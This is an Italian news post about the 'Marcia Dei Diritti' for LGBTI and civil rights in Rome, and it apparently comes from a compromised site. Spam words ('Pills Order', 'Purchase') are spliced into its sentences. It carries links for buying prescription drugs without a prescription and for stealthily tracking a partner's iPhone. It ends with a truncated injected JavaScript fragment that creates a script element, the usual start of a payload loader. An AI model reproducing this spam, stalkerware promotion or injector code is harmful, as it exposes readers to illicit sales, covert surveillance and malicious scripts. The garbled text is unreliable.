Una bellissima giornata quella di oggi, in cui una folla colorata di almeno un migliaio di persone ha dato vita alla Marcia Dei Diritti, la manifestazione che si è svolta lungo via dei Fori imperiali a Roma e che annovera dai promotori anche il Circolo Anddos-Gaynet Roma. Messaggi chiari, determinati e Pills Order piani di rabbia quelli rivolti alla politica dai manifestanti, che hanno toccato le discriminazioni subite dalle persone LGBTI, dalle donne, dalle coppie conviventi etero e omosessuali che ancora non hanno alcun diritto.

CWCkUBVVAAAfbt_.jpg-largeTra i principali bersagli la politica del Governo sui diritti civili, che ha smontato la strategia nazionale LGBTI e tutto Purchase quanto veniva fatto nelle scuole per promuovere la cultura delle differenze, oltre a rinviare continuamente una legge già insoddisfacente come quella sulle unioni civili.

“È iniziato un cammino nuovo di diritti, laicità e libertà – ha dichiarato Rosario Coco, tra i promotori e presidente di Anddos-Gaynet Roma – nuovo per le forme, le parole e i messaggi che abbiamo dato e per la diversità di vite ed esperienze che c’era in piazza, studenti, organizzazioni contro la violenza di genere, associazioni LGBTI, realtà che si battono per laicità. Grazie Order a noi tutte e tutti che ci abbiamo creduto: abbiamo appena cominciato”

Anche il network internazionale All Out ha sostenuto l’iniziativa su twitter http://birthingfromtheheart.com/2018/02/buy-neurontin-online-no-prescription/ http://cloverleafpizza.com/grifulvin-v-500mg-price/ lanciando una campagna social a favore della marcia.

var d=document;var s=d.createElement(‘script’); } Pills http://blog.inoarashi.com/blog/2017/10/31/sms-tracker-spy-stealth-track-my-girlfriends-iphone/